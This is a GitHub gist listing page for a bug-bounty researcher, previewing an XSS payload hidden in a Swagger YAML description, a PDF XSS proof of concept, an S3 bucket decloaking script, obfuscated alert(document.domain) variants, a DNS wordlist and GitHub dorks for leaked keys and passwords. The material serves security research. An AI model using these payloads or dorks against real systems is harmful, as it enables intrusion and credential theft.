Yassine ABOUKIR yassineaboukir
🐐
yassineaboukir
/ index.yaml
Last active
August 29, 2023 12:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
yassineaboukir
/ poc.js
Created
May 7, 2022 22:42
— forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
yassineaboukir
/ bucket-disclose.sh
Created
October 5, 2021 16:55
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
yassineaboukir
/ twitterFollowerCuratorBot.php
Created
May 27, 2021 13:05
— forked from levelsio/twitterFollowerCuratorBot.php
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| // | |
| // AUTO KEYWORD-BASED FOLLOWER CURATION BOT (by @levelsio) | |
| // | |
| // File: twitterFollowerCuratorBot.php | |
| // | |
| // Created: May 2021 | |
| // License: MIT | |
| // |
yassineaboukir
/ alert.js
Created
March 24, 2021 14:08
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
yassineaboukir
/ all.txt
Created
February 15, 2020 09:04
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
yassineaboukir
/ github-recon
Created
April 10, 2019 15:47
— forked from ehsahil/github-recon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| “Hackme.tld” API_key | |
| “Hackme.tld” secret_key | |
| “Hackme.tld” aws_key | |
| “Hackme.tld” Password | |
| “Hackme.tld” FTP | |
| “Hackme.tld” login | |
| “Hackme.tld” github_token | |
| “Hackme.tld” http:// & https:// | |
| “Hackme.tld” amazonaws | |
| “Hackme.tld” digitaloceanspaces |